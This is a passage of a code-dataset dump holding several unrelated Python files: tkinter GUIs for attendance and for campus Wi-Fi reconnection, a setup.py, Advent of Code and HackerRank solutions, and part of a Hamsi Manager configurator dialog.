Divider=tk.Label(root)\r\n Divider[\"bg\"] = \"#90ee90\"\r\n ft = tkFont.Font(family='Times',size=10)\r\n Divider[\"font\"] = ft\r\n Divider[\"fg\"] = \"#333333\"\r\n Divider[\"justify\"] = \"center\"\r\n Divider[\"text\"] = \"\"\r\n 
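# thin light-green divider strip drawn across the full window width, just under the title bar\r\n 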
Divider.place(x=0,y=170,width=741,height=3)\r\n\r\n Title=tk.Label(root)\r\n Title[\"bg\"] = \"#393d49\"\r\n ft = tkFont.Font(family='Times',size=32)\r\n Title[\"font\"] = ft\r\n Title[\"fg\"] = \"#ffffff\"\r\n Title[\"justify\"] = \"center\"\r\n Title[\"text\"] = \"Attendance Panel\"\r\n Title.place(x=0,y=75,width=741,height=75)\r\n\r\n image1 = Image.open(\"Dataset/start.png\")\r\n image1 = image1.resize((150,150),Image.ANTIALIAS)\r\n test = ImageTk.PhotoImage(image1)\r\n Start=tk.Button(root, image = test, compound=LEFT)\r\n Start.image=test\r\n Start[\"bg\"] = \"#22ee33\"\r\n Start[\"borderwidth\"] = \"5px\"\r\n ft = tkFont.Font(family='Times',size=18)\r\n Start[\"font\"] = ft\r\n Start[\"fg\"] = \"#000000\"\r\n Start[\"justify\"] = \"center\"\r\n Start[\"text\"] = \"Start\\nAttendance\"\r\n Start.place(x=50,y=200,width=300,height=150)\r\n Start[\"command\"] = lambda : attendance()\r\n hover(Start,\"#22ee33\")\r\n\r\n image1 = Image.open(\"Dataset/stop.png\")\r\n image1 = image1.resize((150,150),Image.ANTIALIAS)\r\n test = ImageTk.PhotoImage(image1)\r\n Stop=tk.Button(root, image = test, compound=LEFT)\r\n Stop.image=test\r\n today = date.today()\r\n Stop[\"bg\"] = \"#cc0001\"\r\n Stop[\"borderwidth\"] = \"5px\"\r\n ft = tkFont.Font(family='Times',size=18)\r\n Stop[\"font\"] = ft\r\n Stop[\"fg\"] = \"#ffffff\"\r\n Stop[\"justify\"] = \"center\"\r\n Stop[\"text\"] = \"Save & Stop\"\r\n Stop.place(x=400,y=200,width=300,height=150)\r\n Stop[\"command\"] = lambda : fill_attendance(table_name)\r\n hover(Stop,\"#cc0011\")\r\n\r\n image1 = Image.open(\"Dataset/download.png\")\r\n image1 = image1.resize((100,100),Image.ANTIALIAS)\r\n test = ImageTk.PhotoImage(image1)\r\n Download=tk.Button(root, image = test, compound=LEFT)\r\n Download.image=test\r\n Download[\"bg\"] = \"#ffd700\"\r\n Download[\"borderwidth\"] = \"5px\"\r\n ft = tkFont.Font(family='Times',size=14)\r\n Download[\"font\"] = ft\r\n Download[\"fg\"] = \"#000000\"\r\n Download[\"justify\"] = \"center\"\r\n Download[\"text\"] = \"Download Today's Attendance\"\r\n Download.place(x=180,y=390,width=400,height=100)\r\n Download[\"command\"] = lambda : save_attendance(table_name)\r\n hover(Download,\"#ffd700\")\r\n\r\ndef attendance():\r\n global attendance_list\r\n attendance_list = list(recognize_attendence())\r\n\r\n\r\ndef Back_command(root,table_name, class_name, subject_name,username):\r\n import FacultyMenu as FM\r\n FM.main(root, table_name,class_name, subject_name,username)\r\n\r\ndef Logout_command(root):\r\n answer = askokcancel( title='Logout Confirmation', message='Are You Sure to Logout ?', icon=WARNING)\r\n if answer :\r\n import Welcome as welcome\r\n welcome.main(root)\r\n\r\n\r\ndef Start_command(root):\r\n pass\r\n\r\ndef Stop_command(root):\r\n print(\"command\")\r\n\r\n\r\ndef save_attendance(table_name):\r\n result = download_daily_attendance(table_name,date.today().strftime(\"%d_%m_%Y\"))\r\n\r\n if result == True:\r\n messagebox.showinfo(\"success\", \"Attendace downloaded successfully!!\")\r\n else:\r\n messagebox.showerror(\"error\",\"please contact support team!\")\r\n\r\n\r\n\r\ndef fill_attendance(table_name):\r\n result = mark_attendance(table_name,date.today().strftime(\"%d_%m_%Y\"), attendance_list)\r\n if result == True:\r\n messagebox.showinfo(\"success\", \"Attendace marked successfully!!\")\r\n else:\r\n messagebox.showerror(\"error\",\"please contact support 
team!\")\r\n","repo_name":"ThePhilosopher4097/Smart_Attendance_System","sub_path":"AttendancePage.py","file_name":"AttendancePage.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73989435253","text":"import os\nfrom argparse import Namespace\n\ntry:\n from setuptools import setup, find_packages\n\n _has_setuptools = True\nexcept ImportError:\n from distutils.core import setup, find_packages\n\nDESCRIPTION = \"cmdbtools: A command line tools for CMDB variant browser.\"\n\nmeta = Namespace(\n __DISTNAME__=\"cmdbtools\",\n __AUTHOR__=\"Shujia Huang\",\n __AUTHOR_EMAIL__=\"huangshujia9@gmail.com\",\n __URL__=\"https://github.com/ShujiaHuang/cmdbtools\",\n __LICENSE__=\"BSD (3-clause)\",\n __DOWNLOAD_URL__=\"https://github.com/ShujiaHuang/cmdbtools\",\n __VERSION__=\"1.1.3\",\n)\n\nif __name__ == \"__main__\":\n THIS_PATH = os.path.abspath(os.path.dirname(__file__))\n long_description = os.path.join(THIS_PATH, \"README.md\")\n\n setup(name=meta.__DISTNAME__,\n version=meta.__VERSION__,\n author=meta.__AUTHOR__,\n author_email=meta.__AUTHOR_EMAIL__,\n maintainer=meta.__AUTHOR__,\n maintainer_email=meta.__AUTHOR_EMAIL__,\n description=DESCRIPTION,\n long_description=(open(long_description).read()),\n long_description_content_type=\"text/markdown\",\n license=meta.__LICENSE__,\n url=meta.__URL__,\n download_url=meta.__URL__,\n packages=find_packages(),\n include_package_data=True,\n install_requires=[\n \"PyYAML>=5.1.2\"\n ],\n entry_points={\n \"console_scripts\": [\n \"cmdbtools = cmdbtools.cmdbtools:main\"\n ]\n },\n classifiers=[\n \"Intended Audience :: Science/Research\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"License :: OSI Approved :: BSD License\",\n \"Topic :: Scientific/Engineering :: Bio-Informatics\",\n \"Operating System :: POSIX\",\n \"Operating System :: POSIX :: Linux\",\n \"Operating System :: MacOS\"],\n )\n","repo_name":"ShujiaHuang/cmdbtools","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"} +{"seq_id":"71461716533","text":"import re\n\n\ndef parse_file():\n sensors = {}\n beacons = {}\n with open(\"input.txt\", \"r\") as file:\n for line in file:\n y, x, z, w = [int(_) for _ in re.findall(r'-?\\d+', line.strip())]\n d = abs(y-z) + abs(x-w)\n sensors[(y, x)] = d\n beacons[(z, w)] = True\n return sensors, beacons\n\n\ndef can_reach(sensor: tuple, d, row_y):\n return d > abs(sensor[1] - row_y)\n\n\n# |x1 - x2| + |y1 - y2| = d\n# |s[0] - x| + |s[1] - row_y| = d\n# |s[0] - x| = d - |s[1] - row_y|\n# x = +-(d - |s[1] - row_y|) + s[0]\n# from -(d - |s[1] - row_y|) + s[0] to + (d - |s[1] - row_y|) + s[0]\ndef create_points(s: tuple, d, row_y, beacons, result_set):\n _min_x = -(d - abs(s[1]-row_y)) + s[0]\n _max_x = (d - abs(s[1]-row_y)) + s[0]\n max_x, min_x = max(_min_x, _max_x), min(_min_x, _max_x)\n for i in range(min_x, max_x+1, 1):\n if not beacons.get((i, row_y), False):\n result_set.add((i, row_y))\n\n\ndef create_outer_perimetar(sensor, d, perimetar_set: set, MIN_X, MAX_X):\n min_x, max_x = sensor[0] - d, sensor[0] + d\n min_y, max_y = sensor[1] - d, sensor[1] + d\n test = False\n y1, y2 = sensor[1], sensor[1]\n if y1 >= MIN_X and y1 <= MAX_X:\n if min_x > MIN_X:\n perimetar_set.add((y1, min_x))\n if max_x < MAX_X:\n perimetar_set.add((y1, 
max_x))\n for x in range(min_x+1, max_x+1):\n if not test:\n y1 = y1 + 1\n y2 = y2 - 1\n if y1 == max_y and y2 == min_y:\n test = True\n else:\n y1 = y1 - 1\n y2 = y2 + 1\n if x < MIN_X or x > MAX_X:\n continue\n else:\n if y1 > MIN_X or y1 < MAX_X:\n perimetar_set.add((y1, x))\n if y2 > MIN_X or y2 < MAX_X:\n perimetar_set.add((y2, x))\n\n\ndef can_sensor_reach(sensor, d, p):\n return d >= abs(sensor[1] - p[1]) + abs(sensor[0] - p[0])\n\n\ndef part_1():\n row_y = 2000000\n sensors, beacons = parse_file()\n result_set = set()\n for sensor, d in sensors.items():\n if can_reach(sensor, d, row_y):\n create_points(sensor, d, row_y, beacons, result_set)\n return len(result_set)\n\n\ndef part_2():\n MIN_X, MAX_X = 0, 4000000\n sensors, beacons = parse_file()\n perimetar_set = set()\n for sensor, d in sensors.items():\n create_outer_perimetar(sensor, d+1, perimetar_set, MIN_X, MAX_X)\n\n perimetar_list = list(perimetar_set)\n\n for x in perimetar_list:\n test = False\n if x[0] < MIN_X or x[1] < MIN_X or x[0] > MAX_X or x[1] > MAX_X:\n continue\n for sensor, d in sensors.items():\n test = test or can_sensor_reach(sensor, d, x)\n if test:\n break\n if not test:\n return x[0]*4000000 + x[1]\n\n\nprint(\"Part 1:\", part_1())\nprint(\"Part 2:\", part_2())\n","repo_name":"HristijanVilos/Advent-of-code-2022","sub_path":"day15/beacon_exclusion_zone.py","file_name":"beacon_exclusion_zone.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74108368054","text":"import sys\n\ndef is_sorted(array):\n \"\"\"\n Check if the given array is sorted in non-decreasing order.\n\n Args:\n - array (list): The input array.\n\n Returns:\n - bool: True if the array is sorted, False otherwise.\n \"\"\"\n return all(array[i] <= array[i + 1] for i in range(len(array) - 1))\n\ndef almost_sorted(arr):\n \"\"\"\n Check if the given array can be almost sorted by either swapping two elements or reversing a subarray.\n\n Args:\n - arr (list): The input array.\n\n Returns:\n - bool: True if the array can be almost sorted, False otherwise.\n \"\"\"\n swap_left = -1\n swap_right = -1\n\n # Find the first occurrence where the array is not sorted.\n for index in range(1, len(arr)):\n if arr[index - 1] > arr[index]:\n swap_left = index - 1\n break\n \n # Find the last occurrence to swap to make the array sorted.\n for index in range(swap_left + 1, len(arr)):\n if index == len(arr) - 1 or arr[index + 1] > arr[swap_left]:\n swap_right = index\n arr[swap_left], arr[swap_right] = arr[swap_right], arr[swap_left]\n break\n \n # Check if the array is sorted after the swap.\n if is_sorted(arr):\n print(\"yes\")\n print(\"swap {} {}\".format(swap_left + 1, swap_right + 1))\n return True\n \n # Undo the swap to explore the next possibility.\n arr[swap_left], arr[swap_right] = arr[swap_right], arr[swap_left]\n \n reverse_left = -1\n reverse_right = -1\n\n # Find the subarray to reverse to make the array sorted.\n for index in range(len(arr) - 1):\n if reverse_left == -1 and arr[index] > arr[index + 1]:\n reverse_left = index\n elif reverse_left != -1 and arr[index] < arr[index + 1]:\n reverse_right = index\n break\n \n # Reverse the subarray and check if the array is sorted.\n to_reverse = arr[reverse_left:reverse_right + 1]\n arr = arr[:reverse_left] + to_reverse[::-1] + arr[reverse_right + 1:]\n \n if is_sorted(arr):\n print(\"yes\")\n print(\"reverse {} {}\".format(reverse_left + 1, reverse_right + 1))\n return True\n \n # If neither swap nor 
reverse makes the array sorted.\n print(\"no\")\n return False\n\nif __name__ == \"__main__\":\n # Read the size of the array.\n array_size = int(input().strip())\n \n # Read the array elements.\n array_elements = list(map(int, input().strip().split(' ')))\n\n # Check if the array can be almost sorted.\n almost_sorted(array_elements)\n","repo_name":"sarjus/HackerRank-solutions","sub_path":"almostsorted.py","file_name":"almostsorted.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2239301653","text":"'''\n\n 22点18分: 加入bg可用性检查\n 加入扩展账号功能, 并使用base64编解码\n 20点48分: 重连时间2s-3s\n 2022年6月21日14点54分: 去除重复检查(前置ping), 进一步优化重连耗时\n 2022年6月20日10点51分: 优化提示, 新增提示说明框; 测试ReconnWifi-3s\n 2022年6月19日12点10分: 优化状态显示, 精确到1s级\n 2022年6月18日11点42分: 12小时测试重连稳定 (未触发paraerr, 待测\n'''\nimport tkinter,threading,time,base64\nfrom tkinter import messagebox\n\nfrom util import *\nfrom logoData import logodata\n\nMODE = 1\nMODE_DES = ['',\"常规模式\",\"快速模式\"]\n\ndef getInfo(): \n print(\"getinfo\")\n confPath = \".config\"\n \n if os.path.exists(confPath):\n with open(confPath,'r') as f:\n dc = str(base64.b64decode(f.read()),encoding='utf8')\n info = [i.split(\",\") for i in dc.split(\"\\n\")]\n else:\n info = [ \n ('', '')\n ] \n return info\n\nlb_default = \"请选择重连模式(点击可查看详细说明): \"\nlb_explain = \"\"\"本工具仅供学习交流, 请勿用于商业等其他用途\n\n1. 使用说明: \n 1.1 使用流程\n 1.1.1 选择重连模式(非必选项)\n 1.1.2 点击\"开始运行\"\n 1.1.3 程序运行期间, 可保持较好的联网体验\n \n 1.2 本工具依赖csust-bg连接互联网 \n 1.3 当后台检测到掉线时, 会自动断网重连, 一般耗时 3-15s\n \n2. 重连模式介绍:\n 2.1. 常规模式: 比较稳定, 缺点是偶尔重连响应慢。\n 2.2. 快速模式: 采取激进的断开wifi后重新连接的方案, 测试效果良好\"\"\"\n\ndef mouthOn(evt):\n box = messagebox.showinfo(\"使用须知\",message=lb_explain)\n \ndef mouthHover(evt):\n lb_chooseMode.config(text=lb_default,fg=\"blue\")\n\nclass netStatus(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n print(\"状态检测启动...\")\n self.STAT = False\n \n def ping(self):\n COMMAND_PING = \"ping www.baidu.com -n 1 -w 1000\" \n try:\n ans = subprocess.Popen(COMMAND_PING, stdin=-1, stdout=-1,stderr=-1,shell=True)\n ans.wait(1.5)\n self.STAT = ans.poll() == 0\n except:\n self.STAT = False\n \n def run(self):\n while True:\n self.ping()\n time.sleep(1)\n\ndef update_lb_status(api_stat):\n if api_stat:\n api_msg = \"连接正常\"\n api_color = \"#008c00\"\n else:\n api_msg = \"连接异常, 正重��...\"\n api_color = \"yellow\"\n \n msg = time.strftime(\"%H:%M:%S \") + MODE_DES[MODE] + \" \" + api_msg \n lb_status.config(text=msg, bg=api_color)\n\ndef run():\n netstat = netStatus()\n netstat.setDaemon(True)\n \n utils = bg(3, \"connLog.log\", getInfo(), MODE==2)\n utils.setDaemon(True)\n \n netstat.start()\n utils.start()\n \n while True:\n if utils.STAT_CODE == 500:\n lb_status.config(text=\"错误: 当前不在可用范围,请检查后重试\", bg=\"red\") \n return\n update_lb_status(netstat.STAT)\n time.sleep(1)\n\ndef start():\n lb_chooseMode.config(state=tkinter.DISABLED)\n lb_status.config(text=\"初始化中...\")\n btn_start.config(text=\"正在运行中...\",bg=\"white\",state=tkinter.DISABLED)\n radio_button_normal.config(state=tkinter.DISABLED)\n radio_button_quick.config(state=tkinter.DISABLED)\n \n threading.Thread(target=run).start()\n \ndef modchange():\n global MODE\n res = v.get()\n MODE = res\n\n## 配置窗口参数\ntk = tkinter.Tk()\ntk.title(\"csust-bg\")\n\n## 创建临时图标文件\nwith open(\"temp.ico\",'wb') as templogo:\n templogo.write(base64.b64decode(logodata))\ntk.iconbitmap(\"temp.ico\")\nos.remove(\"temp.ico\")\n\nwd_w = 240\nwd_h = 160\nscr_w = tk.winfo_screenwidth()/2\nscr_h = 
tk.winfo_screenheight()/2\nwd_size = f\"{wd_w}x{wd_h}+{int(scr_w-0.5*wd_w)}+{int(scr_h-0.5*wd_h)}\"\ntk.geometry(wd_size)\ntk.resizable(width=0, height=0)\n\n## 构建 UI\nlb_status = tkinter.Label(tk,text=\"连接状态\",bg=\"#77787b\",width=160)\n\nlb_chooseMode = tkinter.Label(tk,text=\"请选择重连模式: \")\nlb_chooseMode.bind(\"\",mouthHover)\nlb_chooseMode.bind(\"\",mouthOn)\n\nv = tkinter.IntVar() # IntVar() 用于处理整数类型的变量\nradio_button_normal = tkinter.Radiobutton(tk, text = '常规模式', variable = v,value =1,command=modchange)\nradio_button_quick = tkinter.Radiobutton(tk, text = '快速模式', variable = v,value =2,command=modchange)\nradio_button_normal.select()\n\nbtn_start = tkinter.Button(tk,text=\"点击开始\",command=start,width=80,bg=\"#008c00\",fg=\"white\",border=0)\n\nbtn_start.pack(side=\"bottom\")\nlb_status.pack(side=\"top\")\nlb_chooseMode.pack(anchor ='w')\nradio_button_normal.pack(anchor ='w')\nradio_button_quick.pack(anchor ='w')\n\nif __name__ == \"__main__\":\n ## 开始主循环\n tk.mainloop()\n","repo_name":"monicedy/bgnet-GUI-tkinter","sub_path":"csust-bg-tkinter.py","file_name":"csust-bg-tkinter.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34016573024","text":"from Core.MyObjects import *\nfrom Core import Universals as uni\nfrom Core import Dialogs\nfrom Core import Settings\nfrom Core import MyConfigure\nfrom Core import Execute\nimport FileUtils as fu\nfrom Core import ReportBug\n\nMyDialog, MyDialogType, MyParent = getMyDialog()\n\n\nclass Configurator(MyDialog):\n def __init__(self, _page=None):\n MyDialog.__init__(self, MyParent)\n if MyDialogType == \"MDialog\":\n if isActivePyKDE4:\n self.setButtons(MyDialog.NoDefault)\n elif MyDialogType == \"MMainWindow\":\n self.setObjectName(\"Cleaner\")\n setMainWindow(self)\n activePageNo = 0\n if _page == \"configurePage\":\n activePageNo = 2\n elif _page == \"pluginPage\":\n activePageNo = 3\n self.isInstallFinished = False\n self.pageNo, self.pageSize = activePageNo, 4\n self.pnlMain = MWidget(self)\n self.vblMain = MVBoxLayout(self.pnlMain)\n self.hblMain = MHBoxLayout()\n self.lblLeftImage = MLabel()\n self.pmapLeftImage = MPixmap(\"Images:HamsiManager-256x256-1.png\")\n self.lblLeftImage.setPixmap(self.pmapLeftImage)\n self.vblLeftColumn = MVBoxLayout()\n self.vblLeftColumn.addStretch(1)\n self.vblLeftColumn.addWidget(self.lblLeftImage)\n self.vblLeftColumn.addStretch(5)\n self.hblMain.addLayout(self.vblLeftColumn)\n self.pages = []\n for pageNo in range(self.pageSize):\n self.pages.append(self.createPage(pageNo))\n if pageNo != self.pageNo:\n self.pages[-1].setVisible(False)\n self.hblMain.addWidget(self.pages[-1])\n self.vblMain.addLayout(self.hblMain, 20)\n self.hblButtons = MHBoxLayout()\n self.buttons = [MPushButton(translate(\"Reconfigure\", \"Back\")),\n MPushButton(translate(\"Reconfigure\", \"Forward\")),\n MPushButton(translate(\"Reconfigure\", \"Configure\"))]\n self.hblButtons.addStretch(5)\n for btnNo, btn in enumerate(self.buttons):\n if btnNo == len(self.buttons) - 1 or btnNo == 0:\n btn.setVisible(False)\n self.hblButtons.addWidget(btn, 1)\n self.connect(btn, SIGNAL(\"clicked()\"), self.pageChanged)\n self.pbtnCancel = MPushButton(translate(\"Reconfigure\", \"Cancel\"))\n self.pbtnFinish = MPushButton(translate(\"Reconfigure\", \"Finish\"))\n self.pbtnFinish.setVisible(False)\n self.hblButtons.addWidget(self.pbtnCancel, 1)\n self.hblButtons.addWidget(self.pbtnFinish, 1)\n self.connect(self.pbtnCancel, SIGNAL(\"clicked()\"), 
self.close)\n self.connect(self.pbtnFinish, SIGNAL(\"clicked()\"), self.close)\n self.vblMain.addLayout(self.hblButtons)\n self.pageChanged(True)\n if MyDialogType == \"MDialog\":\n if isActivePyKDE4:\n self.setMainWidget(self.pnlMain)\n else:\n self.setLayout(self.vblMain)\n elif MyDialogType == \"MMainWindow\":\n self.setCentralWidget(self.pnlMain)\n moveToCenter(self)\n self.setWindowTitle(translate(\"Reconfigure\", \"Hamsi Manager Configurator\") + \" \" + uni.version)\n self.setWindowIcon(MIcon(\"Images:hamsi.png\"))\n self.setMinimumWidth(650)\n self.setMinimumHeight(350)\n self.show()\n\n def closeEvent(self, _event):\n if self.isInstallFinished is False:\n answer = Dialogs.ask(translate(\"Reconfigure\", \"Finalizing Configuration\"),\n translate(\"Reconfigure\", \"Are You Sure You Want To Quit?\"))\n if answer != Dialogs.Yes:\n _event.ignore()\n MApplication.setQuitOnLastWindowClosed(True)\n\n def createPage(self, _pageNo):\n pnlPage = MWidget()\n HBox = MHBoxLayout()\n pnlPage.setLayout(HBox)\n defaultLangCode = uni.getDefaultLanguageCode()\n if _pageNo == 0:\n if fu.isFile(fu.joinPath(fu.HamsiManagerDirectory, \"Languages\", \"About_\" + defaultLangCode)):\n aboutFileContent = fu.readFromFile(\n fu.joinPath(fu.HamsiManagerDirectory, \"Languages\", \"About_\" + defaultLangCode), \"utf-8\")\n else:\n aboutFileContent = fu.readFromFile(fu.joinPath(fu.HamsiManagerDirectory, \"Languages\", \"About_en_GB\"),\n \"utf-8\")\n lblAbout = MLabel(str(aboutFileContent))\n lblAbout.setWordWrap(True)\n HBox.addWidget(lblAbout)\n elif _pageNo == 1:\n if fu.isFile(fu.joinPath(fu.HamsiManagerDirectory, \"Languages\", \"License_\" + defaultLangCode)):\n licenceFileContent = fu.readFromFile(\n fu.joinPath(fu.HamsiManagerDirectory, \"Languages\", \"License_\" + defaultLangCode), \"utf-8\")\n else:\n licenceFileContent = fu.readFromFile(\n fu.joinPath(fu.HamsiManagerDirectory, \"Languages\", \"License_en_GB\"), \"utf-8\")\n teCopying = MTextEdit()\n teCopying.setPlainText(str(licenceFileContent))\n HBox.addWidget(teCopying)\n elif _pageNo == 2:\n VBox = MVBoxLayout()\n VBox.addStretch(10)\n self.isCreateDesktopShortcut = None\n self.isCreateExecutableLink = None\n self.wAvailableModules = MWidget(self)\n VBox.addWidget(self.wAvailableModules)\n self.vblAvailableModules = MVBoxLayout()\n self.checkAvailableModules()\n VBox.addStretch(1)\n if uni.isRunningAsRoot():\n self.isCreateExecutableLink = MCheckBox(translate(\"Reconfigure\", \"Add To The System\"))\n self.isCreateExecutableLink.setCheckState(Mt.Checked)\n lblExecutableLink = MLabel(translate(\"Reconfigure\", \"Executable Link Path : \"))\n self.leExecutableLink = MLineEdit(\n str(Settings.getUniversalSetting(\"HamsiManagerExecutableLinkPath\", \"/usr/bin/hamsi\")))\n self.connect(self.isCreateExecutableLink, SIGNAL(\"stateChanged(int)\"), self.createExecutableLinkChanged)\n VBox.addWidget(self.isCreateExecutableLink)\n HBox1 = MHBoxLayout()\n HBox1.addWidget(lblExecutableLink)\n HBox1.addWidget(self.leExecutableLink, 10)\n VBox.addLayout(HBox1)\n else:\n self.isCreateDesktopShortcut = MCheckBox(translate(\"Reconfigure\", \"Create Desktop Shortcut.\"))\n self.isCreateDesktopShortcut.setCheckState(Mt.Checked)\n VBox.addWidget(self.isCreateDesktopShortcut)\n VBox.addStretch(10)\n HBox.addLayout(VBox)\n elif _pageNo == 3:\n import MyPlugins\n\n VBox = MVBoxLayout()\n VBox.addStretch(10)\n wPlugins = MyPlugins.MyPluginsForSystem(self)\n HBox.addWidget(wPlugins)\n VBox.addStretch(10)\n HBox.addLayout(VBox)\n return pnlPage\n\n def 
createExecutableLinkChanged(self, _value):\n if _value == 0:\n self.leExecutableLink.setEnabled(False)\n else:\n self.leExecutableLink.setEnabled(True)\n\n def checkAvailableModules(self):\n try:\n mutagenIsAvailable = False\n eyeD3IsAvailable = False\n mysqlIsAvailable = False\n musicbrainzIsAvailable = False\n scintillaIsAvailable = False\n pywin32IsAvailable = False\n beautifulsoup4IsAvailable = False\n try:\n from mutagen import id3\n from mutagen import mp3\n\n mutagenIsAvailable = True\n except: pass\n try:\n import eyed3\n\n eyeD3IsAvailable = True\n except: pass\n if not uni.isWindows:\n try:\n import _mysql as mdb\n\n mysqlIsAvailable = True\n except: pass\n try:\n from musicbrainz2 import webservice, model, utils\n from musicbrainz2.webservice import Query, ArtistFilter, WebServiceError, ReleaseFilter, TrackFilter\n\n musicbrainzIsAvailable = True\n except: pass\n try:\n from PyQt4.Qsci import QsciScintilla\n\n scintillaIsAvailable = True\n except: pass\n try:\n try:\n from bs4 import BeautifulSoup\n except:\n from BeautifulSoup import BeautifulSoup\n\n beautifulsoup4IsAvailable = True\n except: pass\n if uni.isWindows:\n try:\n import win32api, win32con, win32com\n\n pywin32IsAvailable = True\n except: pass\n\n clearAllChildren(self.wAvailableModules)\n\n if mutagenIsAvailable is False:\n lblMutagen = MLabel(translate(\"Reconfigure\",\n \"'mutagen' (python-mutagen) named module has NOT installed in your system.\"))\n lblMutagen.setOpenExternalLinks(True)\n self.vblAvailableModules.addWidget(lblMutagen)\n if eyeD3IsAvailable is False:\n lblEyeD3 = MLabel(translate(\"Reconfigure\",\n \"'eyeD3' (python-eyed3) named module has NOT installed in your system.\"))\n lblEyeD3.setOpenExternalLinks(True)\n self.vblAvailableModules.addWidget(lblEyeD3)\n if not uni.isWindows and mysqlIsAvailable is False:\n lblMysql = MLabel(translate(\"Reconfigure\",\n \"'MySQL' (python-mysql) named module has NOT installed on your system.\"))\n lblMysql.setOpenExternalLinks(True)\n self.vblAvailableModules.addWidget(lblMysql)\n if musicbrainzIsAvailable is False:\n lblMusicbrainz = MLabel(translate(\"Reconfigure\",\n \"'Music Brainz' (python-musicbrainz2) named module has NOT installed on your system.\"))\n lblMusicbrainz.setOpenExternalLinks(True)\n self.vblAvailableModules.addWidget(lblMusicbrainz)\n if scintillaIsAvailable is False:\n lblScintilla = MLabel(translate(\"Reconfigure\",\n \"'QScintilla' (python-qt4-qscintilla) named module has NOT installed on your system.\"))\n lblScintilla.setOpenExternalLinks(True)\n self.vblAvailableModules.addWidget(lblScintilla)\n if uni.isWindows:\n if pywin32IsAvailable is False:\n lblPywin32 = MLabel(translate(\"Reconfigure\",\n \"'Python for Windows Extensions' (pywin32) named module has NOT installed on your system.\"))\n lblPywin32.setOpenExternalLinks(True)\n self.vblAvailableModules.addWidget(lblPywin32)\n if beautifulsoup4IsAvailable is False:\n lblBeautifulsoup4 = MLabel(translate(\"Reconfigure\",\n \"'beautifulsoup4' / 'bs4' (python-beautifulsoup4) named module has NOT installed in your system.\"))\n lblBeautifulsoup4.setOpenExternalLinks(True)\n self.vblAvailableModules.addWidget(lblBeautifulsoup4)\n\n if (mutagenIsAvailable is False or eyeD3IsAvailable is False or\n (not uni.isWindows and mysqlIsAvailable is False) or\n musicbrainzIsAvailable is False or scintillaIsAvailable is False or\n (uni.isWindows and (pywin32IsAvailable is False)) or\n beautifulsoup4IsAvailable is False):\n lblAlert = MLabel(translate(\"Reconfigure\",\n \"You have to install above 
modules to use some features. If you don't want to use all features, you can continue without these modules.
\"))\n self.vblAvailableModules.addWidget(lblAlert)\n btnCheckAvailableModules = MPushButton(translate(\"Reconfigure\", \"Check Again\"))\n self.vblAvailableModules.addWidget(btnCheckAvailableModules)\n self.connect(btnCheckAvailableModules, SIGNAL(\"clicked()\"), self.checkAvailableModules)\n\n self.wAvailableModules.setLayout(self.vblAvailableModules)\n except:\n ReportBug.ReportBug()\n\n def pageChanged(self, _isRunningManual=False):\n try:\n senderObject = None\n if _isRunningManual is False:\n senderObject = self.sender()\n if senderObject == self.buttons[1]:\n self.pageNo += 1\n elif senderObject == self.buttons[0]:\n self.pageNo -= 1\n elif senderObject == self.buttons[2]:\n self.pageNo += 1\n for pageNo, pnlPage in enumerate(self.pages):\n if pageNo != self.pageNo:\n pnlPage.setVisible(False)\n else:\n pnlPage.setVisible(True)\n self.buttons[0].setVisible(False)\n self.buttons[1].setVisible(False)\n self.buttons[2].setVisible(False)\n self.buttons[1].setText(translate(\"Reconfigure\", \"Forward\"))\n if self.pageNo == 0:\n self.buttons[1].setVisible(True)\n elif self.pageNo == 1:\n self.buttons[1].setVisible(True)\n self.buttons[1].setText(translate(\"Reconfigure\", \"Accept\"))\n elif self.pageNo == 2:\n self.buttons[0].setVisible(False)\n self.buttons[1].setVisible(False)\n self.buttons[2].setVisible(True)\n self.pbtnCancel.setVisible(True)\n elif self.pageNo == 3:\n self.buttons[0].setVisible(False)\n self.buttons[1].setVisible(False)\n self.buttons[2].setVisible(False)\n self.pbtnCancel.setVisible(False)\n self.pbtnFinish.setVisible(True)\n self.isInstallFinished = True\n if _isRunningManual is False:\n if senderObject == self.buttons[2]:\n self.reConfigure()\n except:\n ReportBug.ReportBug()\n\n def reConfigure(self):\n try:\n oldPathOfExecutableHamsi = Settings.getUniversalSetting(\"HamsiManagerExecutableLinkPath\", \"/usr/bin/hamsi\")\n if fu.isFile(fu.joinPath(fu.HamsiManagerDirectory, \"HamsiManager.desktop\")):\n if fu.isWritableFileOrDir(fu.joinPath(fu.HamsiManagerDirectory, \"HamsiManager.desktop\")):\n MyConfigure.reConfigureFile(fu.joinPath(fu.HamsiManagerDirectory, \"HamsiManager.desktop\"))\n if self.isCreateDesktopShortcut is not None:\n if self.isCreateDesktopShortcut.checkState() == Mt.Checked:\n desktopPath = uni.getUserDesktopPath()\n if uni.isWindows:\n MyConfigure.createShortCutFile(fu.joinPath(desktopPath, \"Hamsi Manager.lnk\"))\n else:\n fileContent = MyConfigure.getConfiguredDesktopFileContent()\n fu.writeToFile(fu.joinPath(desktopPath, \"HamsiManager.desktop\"), fileContent)\n if uni.isRunningAsRoot():\n executableLink = str(self.leExecutableLink.text())\n if self.isCreateExecutableLink is not None:\n if self.isCreateExecutableLink.checkState() == Mt.Checked:\n if executableLink.strip() != \"\":\n HamsiManagerFileName = Execute.findExecutableBaseName(\"HamsiManager\")\n if fu.isFile(executableLink):\n fu.removeFileOrDir(executableLink)\n fu.createSymLink(fu.joinPath(fu.HamsiManagerDirectory, HamsiManagerFileName),\n executableLink)\n Settings.setUniversalSetting(\"HamsiManagerExecutableLinkPath\", executableLink)\n if oldPathOfExecutableHamsi != executableLink:\n if fu.isFile(oldPathOfExecutableHamsi):\n answer = 